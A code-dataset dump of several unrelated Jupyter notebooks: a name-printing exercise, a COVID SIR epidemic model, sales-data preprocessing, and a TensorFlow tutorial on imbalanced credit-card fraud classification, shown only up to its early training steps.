cb01eb520b80314c4a8fdd3595d84de4735435d4 | 730 | ipynb | Jupyter Notebook | 2020 Осенний семестр/Практическое задание 1/Петров_Задание_1.ipynb | mosalov/Notebook_For_AI_Main | a693d29bf0bdcf824cb4f1eca86ff54b67ba7428 | [
"MIT"
] | 6 | 2021-09-20T10:28:18.000Z | 2022-03-14T18:39:17.000Z | 2020 Осенний семестр/Практическое задание 1/Петров_Задание_1.ipynb | mosalov/Notebook_For_AI_Main | a693d29bf0bdcf824cb4f1eca86ff54b67ba7428 | [
"MIT"
] | 122 | 2020-09-07T11:57:57.000Z | 2022-03-22T06:47:03.000Z | 2020 Осенний семестр/Практическое задание 1/Петров_Задание_1.ipynb | mosalov/Notebook_For_AI_Main | a693d29bf0bdcf824cb4f1eca86ff54b67ba7428 | [
"MIT"
] | 97 | 2020-09-07T11:32:19.000Z | 2022-03-31T10:27:38.000Z | 365 | 729 | 0.689041 | [
[
[
"first_name, last_name = 'Максим','Петров'\nfull_name = first_name+' '+last_name\n\nprint(full_name, len(full_name), sep='\\n')",
"Максим Петров\n13\n"
]
]
] | [
"code"
] | [
[
"code"
]
] |
cb01f703017277b8ab284ab4b2478414726e5896 | 4,883 | ipynb | Jupyter Notebook | SIR Models for Testing Section in MSc Report/USA SIR Model - MSc Project (CMM513).ipynb | aodare90/epidemic_modelling | 6be5eeeccf38e69e45717dfca18bc45cb32e1753 | [
"CC0-1.0"
] | null | null | null | SIR Models for Testing Section in MSc Report/USA SIR Model - MSc Project (CMM513).ipynb | aodare90/epidemic_modelling | 6be5eeeccf38e69e45717dfca18bc45cb32e1753 | [
"CC0-1.0"
] | null | null | null | SIR Models for Testing Section in MSc Report/USA SIR Model - MSc Project (CMM513).ipynb | aodare90/epidemic_modelling | 6be5eeeccf38e69e45717dfca18bc45cb32e1753 | [
"CC0-1.0"
] | null | null | null | 46.504762 | 782 | 0.637313 | [
[
[
"# Adapated from https://scipython.com/book/chapter-8-scipy/additional-examples/the-sir-epidemic-model/ - Courtesy of SciPy\n# Slider from -> https://matplotlib.org/3.1.1/gallery/widgets/slider_demo.html - Courtesty of Matplotlib\n# UK COVID Data -> https://ourworldindata.org/coronavirus/country/united-kingdom?country=~GBR (OWID)\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt, mpld3\nfrom ipywidgets import interactive\n\ncases = pd.read_csv('owid-covid-data.csv')\ncases = cases[cases['iso_code']=='USA']\ncases.drop(['life_expectancy','hospital_beds_per_thousand','handwashing_facilities','male_smokers','female_smokers','diabetes_prevalence','cardiovasc_death_rate','extreme_poverty','gdp_per_capita','aged_70_older', 'aged_65_older','median_age','population_density','population','stringency_index','tests_units','positive_rate','tests_per_case','new_tests_smoothed_per_thousand','new_tests_smoothed','new_tests_per_thousand','total_tests_per_thousand','total_tests','new_tests','new_deaths_per_million','total_deaths_per_million','new_cases_per_million','total_cases_per_million','new_deaths','total_deaths','new_cases','continent','location','new_deaths_smoothed_per_million','new_cases_smoothed_per_million','new_deaths_smoothed','new_cases_smoothed'],axis=1, inplace=True)\ncases = cases[cases['date']=='2020-08-20']\n\npop = pd.read_csv('owid-covid-data.csv')\npop = pop[pop['iso_code']=='USA']\npop.drop(['life_expectancy','hospital_beds_per_thousand','handwashing_facilities','male_smokers','female_smokers','diabetes_prevalence','cardiovasc_death_rate','extreme_poverty','gdp_per_capita','aged_70_older', 'aged_65_older','median_age','population_density','stringency_index','tests_units','positive_rate','tests_per_case','new_tests_smoothed_per_thousand','new_tests_smoothed','new_tests_per_thousand','total_tests_per_thousand','total_tests','new_tests','new_deaths_per_million','total_deaths_per_million','new_cases_per_million','total_cases_per_million','new_deaths','total_deaths','new_cases','continent','location','total_cases', 'new_cases_smoothed','new_deaths_smoothed','new_cases_smoothed_per_million','new_deaths_smoothed_per_million'],axis=1, inplace=True)\npop = pop[pop['date']=='2020-08-20']\n\nN = pop['population']\nI0, R0 = cases['total_cases'], 0\nS0 = N - I0 - R0\nbeta, gamma = 0, 0\nt = np.linspace(0, 60, 60)\n\n# The SIR model differential equations.\ndef sir(y, t, N, beta, gamma):\n S, I, R = y\n dSdt = -beta * S * I / N\n dIdt = beta * S * I / N - gamma * I\n dRdt = gamma * I\n return dSdt, dIdt, dRdt\n\n# Initial conditions vector\ny0 = S0, I0, R0\n\n# Plot the data on three separate curves for S(t), I(t) and R(t)\ndef sir_interactive_func(beta, gamma):\n ret = odeint(sir, y0, t, args=(N, beta, gamma))\n S, I, R = ret.T\n \n fig = plt.figure()\n ax = fig.add_subplot(111, axisbelow=True)\n ax.plot(t, S/1000, 'yellow', lw=1.5, label='Susceptible')\n ax.plot(t, I/1000, 'red', lw=1.5, label='Infected')\n ax.plot(t, R/1000, 'blue', lw=1.5, label='Recovered')\n ax.set_xlabel('Time (days)')\n ax.set_ylabel('Population (1000s)')\n ax.grid(b=True, which='major', c='#bbbbbb', lw=1, ls='-')\n legend = ax.legend()\n legend.get_frame().set_alpha(0.5)\n #mpld3.save_html(fig, 'usa.html')\n\ninteractive_plot = interactive(sir_interactive_func, beta=(0.10,2,0.01), gamma=(0.10,1,0.01))\ninteractive_plot",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code"
]
] |
cb01ff2d32a3ea34d32751ff22cceac57a3dca83 | 274,976 | ipynb | Jupyter Notebook | Data Preprocessing.ipynb | RohithYogi/Predict-Future-Sales | 86437d951053d3c22d65c580dfc890e9945a2ec1 | [
"MIT"
] | null | null | null | Data Preprocessing.ipynb | RohithYogi/Predict-Future-Sales | 86437d951053d3c22d65c580dfc890e9945a2ec1 | [
"MIT"
] | null | null | null | Data Preprocessing.ipynb | RohithYogi/Predict-Future-Sales | 86437d951053d3c22d65c580dfc890e9945a2ec1 | [
"MIT"
] | 1 | 2019-04-12T06:38:17.000Z | 2019-04-12T06:38:17.000Z | 175.367347 | 101,220 | 0.878491 | [
[
[
"import numpy as np\nimport pandas as pd \nimport os\nprint(os.listdir(\"../input\"))",
"['sample_submission.csv', 'test.csv', 'README.md', 'train.csv', 'items.csv', 'shops.csv', 'item_categories.csv']\n"
],
[
"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport numpy.random as nr\nimport math\n\n%matplotlib inline\ndata = pd.read_csv('../input/train.csv')\nprint(data.head(3))\ndata.info()",
" date date_block_num shop_id item_id item_price item_cnt_day \\\n0 28.12.2014 23 25 12179 959.000000 1.0 \n1 23.04.2014 15 25 14042 149.000000 1.0 \n2 03.03.2014 14 12 11373 106.615385 13.0 \n\n ID \n0 2317582 \n1 1576962 \n2 1547382 \n<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 2925849 entries, 0 to 2925848\nData columns (total 7 columns):\ndate object\ndate_block_num int64\nshop_id int64\nitem_id int64\nitem_price float64\nitem_cnt_day float64\nID int64\ndtypes: float64(2), int64(4), object(1)\nmemory usage: 156.3+ MB\n"
],
[
"# Check for negative item_cnt_day \ndata[data['item_cnt_day']<0]['item_cnt_day'].value_counts()",
"_____no_output_____"
],
[
"plt.plot(data[data['item_cnt_day']<0]['item_id'].value_counts().sort_index())",
"_____no_output_____"
],
[
"data_filtered=data.loc[data['item_cnt_day']>0]\ndata_filtered.info()\ndata=data_filtered",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 2918525 entries, 0 to 2925848\nData columns (total 7 columns):\ndate object\ndate_block_num int64\nshop_id int64\nitem_id int64\nitem_price float64\nitem_cnt_day float64\nID int64\ndtypes: float64(2), int64(4), object(1)\nmemory usage: 178.1+ MB\n"
],
[
"item_categories = pd.read_csv('../input/items.csv')\nitem_categories.head(3)",
"_____no_output_____"
],
[
"dt=pd.merge(data, item_categories, how='inner')\ndt.sort_values(by=['date'], inplace=True)\ndt.head(3)",
"_____no_output_____"
],
[
"## Drop column which is unused\ncolumns=['date','item_price','item_name']\nfor c in columns:\n if c in dt:\n dt.drop(c, axis = 1, inplace = True)\ndt[(dt['item_cnt_day']>0)].head(3)",
"_____no_output_____"
],
[
"\n#Group by 'date_block_num', 'shop_id','item_id' and \n#sum the item count per day to get the sum for each month (or date_block_num)\n\ndtf=dt.groupby(['date_block_num', 'shop_id','item_id'])[[\"item_cnt_day\"]].sum().reset_index()",
"_____no_output_____"
],
[
"print(data.size)\nprint(dtf.size)",
"20429675\n6418680\n"
],
[
"dtf.hist(figsize=(15,20))\nplt.figure()",
"_____no_output_____"
],
[
"pd.plotting.scatter_matrix(dtf[['item_cnt_day','item_id','shop_id','date_block_num']],figsize=(10,10))\nplt.figure()",
"_____no_output_____"
],
[
"dtf[(dtf['item_id']==2929) & (dtf['shop_id']==0)]",
"_____no_output_____"
],
[
"dt[(dt['item_id']==2929) & (dt['shop_id']==0)]",
"_____no_output_____"
],
[
"test_shop_id=dt.groupby(['shop_id'])[[\"item_cnt_day\"]].sum().reset_index()\ntest_shop_id.head()\nplt.bar(test_shop_id['shop_id'],test_shop_id [\"item_cnt_day\"])",
"_____no_output_____"
],
[
"\n#Analyze item_id outliers\n\ntest_item_id=dt.groupby(['item_id'])[[\"item_cnt_day\"]].sum().reset_index()\nplt.plot(test_item_id[(test_item_id['item_id']!=20949)]['item_id'],test_item_id[(test_item_id['item_id']!=20949)] [\"item_cnt_day\"])\nplt.plot(test_item_id[(test_item_id['item_cnt_day']<=10000)]['item_id'],test_item_id[(test_item_id['item_cnt_day']<=10000)][\"item_cnt_day\"])\n\nprint(test_item_id[(test_item_id['item_id']!=20949)]['item_id'].describe())\nprint(test_item_id[(test_item_id['item_cnt_day']>12000)]['item_id'].value_counts())\n\n",
"count 21794.000000\nmean 11098.519317\nstd 6396.860317\nmin 0.000000\n25% 5551.250000\n50% 11104.500000\n75% 16646.750000\nmax 22169.000000\nName: item_id, dtype: float64\n5822 1\n17717 1\n3732 1\n20949 1\n2808 1\nName: item_id, dtype: int64\n"
],
[
"test_item_id=dt.groupby(['item_category_id'])[[\"item_cnt_day\"]].sum().reset_index()\nplt.plot(test_item_id['item_category_id'],test_item_id[\"item_cnt_day\"])",
"_____no_output_____"
],
[
"\n#Try to remove outliers (december months)\n\nplt.plot(dt.groupby(['date_block_num'])[[\"item_cnt_day\"]].sum())\ndt_filtered=dt.loc[(dt['date_block_num'] ==9) | (dt['date_block_num'] ==10) | (dt['date_block_num'] ==21)| (dt['date_block_num'] ==22) | (dt['date_block_num'] ==33)]\nprint(dt_filtered.size)\n\n",
"2446908\n"
],
[
"dt_filtered['date_block_num'].value_counts()",
"_____no_output_____"
],
[
"pd.options.mode.chained_assignment = None # default='warn'\n\nidx=dt_filtered.loc[(dt_filtered['date_block_num'] ==9)].index.values\ndt_filtered.at[idx,'date_block_num']=0\ndt_filtered.at[idx,'year']=1\n\nidx=dt_filtered.loc[(dt_filtered['date_block_num'] ==10)].index.values\ndt_filtered.at[idx,'date_block_num']=1\ndt_filtered.at[idx,'year']=1\n\nidx=dt_filtered.loc[(dt_filtered['date_block_num'] ==21)].index.values\ndt_filtered.at[idx,'date_block_num']=0\ndt_filtered.at[idx,'year']=2\n\nidx=dt_filtered.loc[(dt_filtered['date_block_num'] ==22)].index.values\ndt_filtered.at[idx,'date_block_num']=1\ndt_filtered.at[idx,'year']=2\n\nidx=dt_filtered.loc[(dt_filtered['date_block_num'] ==33)].index.values\ndt_filtered.at[idx,'date_block_num']=0\ndt_filtered.at[idx,'year']=3\nprint(dt_filtered['date_block_num'].value_counts())\nprint(dt_filtered['year'].value_counts())",
"0 225702\n1 182116\nName: date_block_num, dtype: int64\n1.0 189785\n2.0 164836\n3.0 53197\nName: year, dtype: int64\n"
],
[
"plt.plot(dt_filtered.groupby(['date_block_num'])[[\"item_cnt_day\"]].sum())\nprint(dt_filtered.head())",
" date_block_num shop_id item_id item_cnt_day ID \\\n1088328 0 55 2381 1.0 957288 \n168366 0 31 7071 1.0 948033 \n783252 0 19 3183 1.0 1000847 \n2215571 0 57 21566 1.0 992975 \n109330 0 30 21377 1.0 964044 \n\n item_category_id year \n1088328 31 1.0 \n168366 19 1.0 \n783252 30 1.0 \n2215571 40 1.0 \n109330 40 1.0 \n"
],
[
"dt_filtered.to_csv('sales_train_trans_filtered.csv', sep=',',index=False)",
"_____no_output_____"
],
[
"dt.to_csv('sales_train_trans.csv', sep=',',index=False)",
"_____no_output_____"
],
[
"\n#Prepare test data : adding category column\n\nsales_test = pd.read_csv('../input/test.csv')\nsales_test.head(3)\n\n",
"_____no_output_____"
],
[
"sales_test1=pd.merge(sales_test, item_categories, how='inner')\nsales_test1.sort_values(by=['ID'], inplace=True)\nsales_test1.head(3)",
"_____no_output_____"
],
[
"sales_test1['shop_id'].value_counts()",
"_____no_output_____"
],
[
"sales_test1.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 10000 entries, 3034 to 252\nData columns (total 8 columns):\ndate 10000 non-null object\ndate_block_num 10000 non-null int64\nshop_id 10000 non-null int64\nitem_id 10000 non-null int64\nitem_price 10000 non-null float64\nID 10000 non-null int64\nitem_name 10000 non-null object\nitem_category_id 10000 non-null int64\ndtypes: float64(1), int64(5), object(2)\nmemory usage: 703.1+ KB\n"
],
[
"sales_test1.isnull().sum()",
"_____no_output_____"
],
[
"sales_test1['item_id'].value_counts().count()",
"_____no_output_____"
],
[
"sales_test1['item_category_id'].value_counts().count()",
"_____no_output_____"
],
[
"dt['item_category_id'].value_counts().count()",
"_____no_output_____"
],
[
"\n##Item_category_id that can be removed\n\n#pd.concat([pd.unique(sales_test1['item_category_id']),pd.unique(sales_test1['item_category_id'])]).drop_duplicates(keep=False)\n#print(\"sales_test1['item_category_id']-->\",pd.unique(sales_test1['item_category_id']))\n#print(\"dt['item_category_id']-->\",pd.unique(dt['item_category_id']))\n#print(\"concatenate-->\", np.concatenate((pd.unique(sales_test1['item_category_id']),pd.unique(dt['item_category_id'])),axis=0))\nnp.unique(np.concatenate((pd.unique(sales_test1['item_category_id']),pd.unique(dt['item_category_id'])),axis=0))\n\na=set(pd.unique(dt['item_category_id']));\nb=set(pd.unique(sales_test1['item_category_id']));\n\nlist(a-b)\n\n",
"_____no_output_____"
],
[
"sales_test1.drop('item_name', axis = 1, inplace = True)\nsales_test1.to_csv('sales_test1.csv', sep=',',index=False)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb021f64bfb273e74c3b24e1e056356da19c24b5 | 57,494 | ipynb | Jupyter Notebook | site/en/tutorials/structured_data/imbalanced_data.ipynb | arshPratap/docs | b6c5c4e272a2be7aab27573d747f4c3edcc5d4b8 | [
"Apache-2.0"
] | 1 | 2020-02-14T04:02:02.000Z | 2020-02-14T04:02:02.000Z | site/en/tutorials/structured_data/imbalanced_data.ipynb | arshPratap/docs | b6c5c4e272a2be7aab27573d747f4c3edcc5d4b8 | [
"Apache-2.0"
] | 32 | 2020-07-23T21:36:02.000Z | 2020-09-11T05:46:09.000Z | site/en/tutorials/structured_data/imbalanced_data.ipynb | arshPratap/docs | b6c5c4e272a2be7aab27573d747f4c3edcc5d4b8 | [
"Apache-2.0"
] | 2 | 2020-05-14T12:53:13.000Z | 2020-07-30T20:12:17.000Z | 34.427545 | 741 | 0.548927 | [
[
[
"#### Copyright 2019 The TensorFlow Authors.",
"_____no_output_____"
]
],
[
[
"#@title Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.",
"_____no_output_____"
]
],
[
[
"# Classification on imbalanced data",
"_____no_output_____"
],
[
"<table class=\"tfo-notebook-buttons\" align=\"left\">\n <td>\n <a target=\"_blank\" href=\"https://www.tensorflow.org/tutorials/structured_data/imbalanced_data\"><img src=\"https://www.tensorflow.org/images/tf_logo_32px.png\" />View on TensorFlow.org</a>\n </td>\n <td>\n <a target=\"_blank\" href=\"https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/structured_data/imbalanced_data.ipynb\"><img src=\"https://www.tensorflow.org/images/colab_logo_32px.png\" />Run in Google Colab</a>\n </td>\n <td>\n <a target=\"_blank\" href=\"https://github.com/tensorflow/docs/blob/master/site/en/tutorials/structured_data/imbalanced_data.ipynb\"><img src=\"https://www.tensorflow.org/images/GitHub-Mark-32px.png\" />View source on GitHub</a>\n </td>\n <td>\n <a href=\"https://storage.googleapis.com/tensorflow_docs/docs/site/en/tutorials/structured_data/imbalanced_data.ipynb\"><img src=\"https://www.tensorflow.org/images/download_logo_32px.png\" />Download notebook</a>\n </td>\n</table>",
"_____no_output_____"
],
[
"This tutorial demonstrates how to classify a highly imbalanced dataset in which the number of examples in one class greatly outnumbers the examples in another. You will work with the [Credit Card Fraud Detection](https://www.kaggle.com/mlg-ulb/creditcardfraud) dataset hosted on Kaggle. The aim is to detect a mere 492 fraudulent transactions from 284,807 transactions in total. You will use [Keras](https://www.tensorflow.org/guide/keras/overview) to define the model and [class weights](https://www.tensorflow.org/versions/r2.0/api_docs/python/tf/keras/Model) to help the model learn from the imbalanced data. .\n\nThis tutorial contains complete code to:\n\n* Load a CSV file using Pandas.\n* Create train, validation, and test sets.\n* Define and train a model using Keras (including setting class weights).\n* Evaluate the model using various metrics (including precision and recall).\n* Try common techniques for dealing with imbalanced data like:\n * Class weighting \n * Oversampling\n",
"_____no_output_____"
],
[
"## Setup",
"_____no_output_____"
]
],
[
[
"import tensorflow as tf\nfrom tensorflow import keras\n\nimport os\nimport tempfile\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nimport sklearn\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler",
"_____no_output_____"
],
[
"mpl.rcParams['figure.figsize'] = (12, 10)\ncolors = plt.rcParams['axes.prop_cycle'].by_key()['color']",
"_____no_output_____"
]
],
[
[
"## Data processing and exploration",
"_____no_output_____"
],
[
"### Download the Kaggle Credit Card Fraud data set\n\nPandas is a Python library with many helpful utilities for loading and working with structured data. It can be used to download CSVs into a Pandas [DataFrame](https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.html#pandas.DataFrame).\n\nNote: This dataset has been collected and analysed during a research collaboration of Worldline and the [Machine Learning Group](http://mlg.ulb.ac.be) of ULB (Université Libre de Bruxelles) on big data mining and fraud detection. More details on current and past projects on related topics are available [here](https://www.researchgate.net/project/Fraud-detection-5) and the page of the [DefeatFraud](https://mlg.ulb.ac.be/wordpress/portfolio_page/defeatfraud-assessment-and-validation-of-deep-feature-engineering-and-learning-solutions-for-fraud-detection/) project",
"_____no_output_____"
]
],
[
[
"file = tf.keras.utils\nraw_df = pd.read_csv('https://storage.googleapis.com/download.tensorflow.org/data/creditcard.csv')\nraw_df.head()",
"_____no_output_____"
],
[
"raw_df[['Time', 'V1', 'V2', 'V3', 'V4', 'V5', 'V26', 'V27', 'V28', 'Amount', 'Class']].describe()",
"_____no_output_____"
]
],
[
[
"### Examine the class label imbalance\n\nLet's look at the dataset imbalance:",
"_____no_output_____"
]
],
[
[
"neg, pos = np.bincount(raw_df['Class'])\ntotal = neg + pos\nprint('Examples:\\n Total: {}\\n Positive: {} ({:.2f}% of total)\\n'.format(\n total, pos, 100 * pos / total))",
"_____no_output_____"
]
],
[
[
"This shows the small fraction of positive samples.",
"_____no_output_____"
],
[
"### Clean, split and normalize the data\n\nThe raw data has a few issues. First the `Time` and `Amount` columns are too variable to use directly. Drop the `Time` column (since it's not clear what it means) and take the log of the `Amount` column to reduce its range.",
"_____no_output_____"
]
],
[
[
"cleaned_df = raw_df.copy()\n\n# You don't want the `Time` column.\ncleaned_df.pop('Time')\n\n# The `Amount` column covers a huge range. Convert to log-space.\neps = 0.001 # 0 => 0.1¢\ncleaned_df['Log Ammount'] = np.log(cleaned_df.pop('Amount')+eps)",
"_____no_output_____"
]
],
[
[
"Split the dataset into train, validation, and test sets. The validation set is used during the model fitting to evaluate the loss and any metrics, however the model is not fit with this data. The test set is completely unused during the training phase and is only used at the end to evaluate how well the model generalizes to new data. This is especially important with imbalanced datasets where [overfitting](https://developers.google.com/machine-learning/crash-course/generalization/peril-of-overfitting) is a significant concern from the lack of training data.",
"_____no_output_____"
]
],
[
[
"# Use a utility from sklearn to split and shuffle your dataset.\ntrain_df, test_df = train_test_split(cleaned_df, test_size=0.2)\ntrain_df, val_df = train_test_split(train_df, test_size=0.2)\n\n# Form np arrays of labels and features.\ntrain_labels = np.array(train_df.pop('Class'))\nbool_train_labels = train_labels != 0\nval_labels = np.array(val_df.pop('Class'))\ntest_labels = np.array(test_df.pop('Class'))\n\ntrain_features = np.array(train_df)\nval_features = np.array(val_df)\ntest_features = np.array(test_df)",
"_____no_output_____"
]
],
[
[
"Normalize the input features using the sklearn StandardScaler.\nThis will set the mean to 0 and standard deviation to 1.\n\nNote: The `StandardScaler` is only fit using the `train_features` to be sure the model is not peeking at the validation or test sets. ",
"_____no_output_____"
]
],
[
[
"scaler = StandardScaler()\ntrain_features = scaler.fit_transform(train_features)\n\nval_features = scaler.transform(val_features)\ntest_features = scaler.transform(test_features)\n\ntrain_features = np.clip(train_features, -5, 5)\nval_features = np.clip(val_features, -5, 5)\ntest_features = np.clip(test_features, -5, 5)\n\n\nprint('Training labels shape:', train_labels.shape)\nprint('Validation labels shape:', val_labels.shape)\nprint('Test labels shape:', test_labels.shape)\n\nprint('Training features shape:', train_features.shape)\nprint('Validation features shape:', val_features.shape)\nprint('Test features shape:', test_features.shape)\n",
"_____no_output_____"
]
],
[
[
"Caution: If you want to deploy a model, it's critical that you preserve the preprocessing calculations. The easiest way to implement them as layers, and attach them to your model before export.\n",
"_____no_output_____"
],
[
"### Look at the data distribution\n\nNext compare the distributions of the positive and negative examples over a few features. Good questions to ask yourself at this point are:\n\n* Do these distributions make sense? \n * Yes. You've normalized the input and these are mostly concentrated in the `+/- 2` range.\n* Can you see the difference between the distributions?\n * Yes the positive examples contain a much higher rate of extreme values.",
"_____no_output_____"
]
],
[
[
"pos_df = pd.DataFrame(train_features[ bool_train_labels], columns=train_df.columns)\nneg_df = pd.DataFrame(train_features[~bool_train_labels], columns=train_df.columns)\n\nsns.jointplot(pos_df['V5'], pos_df['V6'],\n kind='hex', xlim=(-5,5), ylim=(-5,5))\nplt.suptitle(\"Positive distribution\")\n\nsns.jointplot(neg_df['V5'], neg_df['V6'],\n kind='hex', xlim=(-5,5), ylim=(-5,5))\n_ = plt.suptitle(\"Negative distribution\")",
"_____no_output_____"
]
],
[
[
"## Define the model and metrics\n\nDefine a function that creates a simple neural network with a densly connected hidden layer, a [dropout](https://developers.google.com/machine-learning/glossary/#dropout_regularization) layer to reduce overfitting, and an output sigmoid layer that returns the probability of a transaction being fraudulent: ",
"_____no_output_____"
]
],
[
[
"METRICS = [\n keras.metrics.TruePositives(name='tp'),\n keras.metrics.FalsePositives(name='fp'),\n keras.metrics.TrueNegatives(name='tn'),\n keras.metrics.FalseNegatives(name='fn'), \n keras.metrics.BinaryAccuracy(name='accuracy'),\n keras.metrics.Precision(name='precision'),\n keras.metrics.Recall(name='recall'),\n keras.metrics.AUC(name='auc'),\n keras.metrics.AUC(name='prc', curve='PR'), # precision-recall curve\n]\n\ndef make_model(metrics=METRICS, output_bias=None):\n if output_bias is not None:\n output_bias = tf.keras.initializers.Constant(output_bias)\n model = keras.Sequential([\n keras.layers.Dense(\n 16, activation='relu',\n input_shape=(train_features.shape[-1],)),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(1, activation='sigmoid',\n bias_initializer=output_bias),\n ])\n\n model.compile(\n optimizer=keras.optimizers.Adam(learning_rate=1e-3),\n loss=keras.losses.BinaryCrossentropy(),\n metrics=metrics)\n\n return model",
"_____no_output_____"
]
],
[
[
"### Understanding useful metrics\n\nNotice that there are a few metrics defined above that can be computed by the model that will be helpful when evaluating the performance.\n\n\n\n* **False** negatives and **false** positives are samples that were **incorrectly** classified\n* **True** negatives and **true** positives are samples that were **correctly** classified\n* **Accuracy** is the percentage of examples correctly classified\n> $\\frac{\\text{true samples}}{\\text{total samples}}$\n* **Precision** is the percentage of **predicted** positives that were correctly classified\n> $\\frac{\\text{true positives}}{\\text{true positives + false positives}}$\n* **Recall** is the percentage of **actual** positives that were correctly classified\n> $\\frac{\\text{true positives}}{\\text{true positives + false negatives}}$\n* **AUC** refers to the Area Under the Curve of a Receiver Operating Characteristic curve (ROC-AUC). This metric is equal to the probability that a classifier will rank a random positive sample higher than a random negative sample.\n* **AUPRC** refers to Area Under the Curve of the Precision-Recall Curve. This metric computes precision-recall pairs for different probability thresholds. \n\nNote: Accuracy is not a helpful metric for this task. You can 99.8%+ accuracy on this task by predicting False all the time. \n\nRead more:\n* [True vs. False and Positive vs. Negative](https://developers.google.com/machine-learning/crash-course/classification/true-false-positive-negative)\n* [Accuracy](https://developers.google.com/machine-learning/crash-course/classification/accuracy)\n* [Precision and Recall](https://developers.google.com/machine-learning/crash-course/classification/precision-and-recall)\n* [ROC-AUC](https://developers.google.com/machine-learning/crash-course/classification/roc-and-auc)\n* [Relationship between Precision-Recall and ROC Curves](https://www.biostat.wisc.edu/~page/rocpr.pdf)",
"_____no_output_____"
],
[
"## Baseline model",
"_____no_output_____"
],
[
"### Build the model\n\nNow create and train your model using the function that was defined earlier. Notice that the model is fit using a larger than default batch size of 2048, this is important to ensure that each batch has a decent chance of containing a few positive samples. If the batch size was too small, they would likely have no fraudulent transactions to learn from.\n\n\nNote: this model will not handle the class imbalance well. You will improve it later in this tutorial.",
"_____no_output_____"
]
],
[
[
"EPOCHS = 100\nBATCH_SIZE = 2048\n\nearly_stopping = tf.keras.callbacks.EarlyStopping(\n monitor='val_prc', \n verbose=1,\n patience=10,\n mode='max',\n restore_best_weights=True)",
"_____no_output_____"
],
[
"model = make_model()\nmodel.summary()",
"_____no_output_____"
]
],
[
[
"Test run the model:",
"_____no_output_____"
]
],
[
[
"model.predict(train_features[:10])",
"_____no_output_____"
]
],
[
[
"### Optional: Set the correct initial bias.",
"_____no_output_____"
],
[
"These initial guesses are not great. You know the dataset is imbalanced. Set the output layer's bias to reflect that (See: [A Recipe for Training Neural Networks: \"init well\"](http://karpathy.github.io/2019/04/25/recipe/#2-set-up-the-end-to-end-trainingevaluation-skeleton--get-dumb-baselines)). This can help with initial convergence.",
"_____no_output_____"
],
[
"With the default bias initialization the loss should be about `math.log(2) = 0.69314` ",
"_____no_output_____"
]
],
[
[
"results = model.evaluate(train_features, train_labels, batch_size=BATCH_SIZE, verbose=0)\nprint(\"Loss: {:0.4f}\".format(results[0]))",
"_____no_output_____"
]
],
[
[
"The correct bias to set can be derived from:\n\n$$ p_0 = pos/(pos + neg) = 1/(1+e^{-b_0}) $$\n$$ b_0 = -log_e(1/p_0 - 1) $$\n$$ b_0 = log_e(pos/neg)$$",
"_____no_output_____"
]
],
[
[
"initial_bias = np.log([pos/neg])\ninitial_bias",
"_____no_output_____"
]
],
[
[
"Set that as the initial bias, and the model will give much more reasonable initial guesses. \n\nIt should be near: `pos/total = 0.0018`",
"_____no_output_____"
]
],
[
[
"model = make_model(output_bias=initial_bias)\nmodel.predict(train_features[:10])",
"_____no_output_____"
]
],
[
[
"With this initialization the initial loss should be approximately:\n\n$$-p_0log(p_0)-(1-p_0)log(1-p_0) = 0.01317$$",
"_____no_output_____"
]
],
[
[
"results = model.evaluate(train_features, train_labels, batch_size=BATCH_SIZE, verbose=0)\nprint(\"Loss: {:0.4f}\".format(results[0]))",
"_____no_output_____"
]
],
[
[
"This initial loss is about 50 times less than if would have been with naive initialization.\n\nThis way the model doesn't need to spend the first few epochs just learning that positive examples are unlikely. This also makes it easier to read plots of the loss during training.",
"_____no_output_____"
],
[
"### Checkpoint the initial weights\n\nTo make the various training runs more comparable, keep this initial model's weights in a checkpoint file, and load them into each model before training:",
"_____no_output_____"
]
],
[
[
"initial_weights = os.path.join(tempfile.mkdtemp(), 'initial_weights')\nmodel.save_weights(initial_weights)",
"_____no_output_____"
]
],
[
[
"### Confirm that the bias fix helps\n\nBefore moving on, confirm quick that the careful bias initialization actually helped.\n\nTrain the model for 20 epochs, with and without this careful initialization, and compare the losses: ",
"_____no_output_____"
]
],
[
[
"model = make_model()\nmodel.load_weights(initial_weights)\nmodel.layers[-1].bias.assign([0.0])\nzero_bias_history = model.fit(\n train_features,\n train_labels,\n batch_size=BATCH_SIZE,\n epochs=20,\n validation_data=(val_features, val_labels), \n verbose=0)",
"_____no_output_____"
],
[
"model = make_model()\nmodel.load_weights(initial_weights)\ncareful_bias_history = model.fit(\n train_features,\n train_labels,\n batch_size=BATCH_SIZE,\n epochs=20,\n validation_data=(val_features, val_labels), \n verbose=0)",
"_____no_output_____"
],
[
"def plot_loss(history, label, n):\n # Use a log scale on y-axis to show the wide range of values.\n plt.semilogy(history.epoch, history.history['loss'],\n color=colors[n], label='Train ' + label)\n plt.semilogy(history.epoch, history.history['val_loss'],\n color=colors[n], label='Val ' + label,\n linestyle=\"--\")\n plt.xlabel('Epoch')\n plt.ylabel('Loss')",
"_____no_output_____"
],
[
"plot_loss(zero_bias_history, \"Zero Bias\", 0)\nplot_loss(careful_bias_history, \"Careful Bias\", 1)",
"_____no_output_____"
]
],
[
[
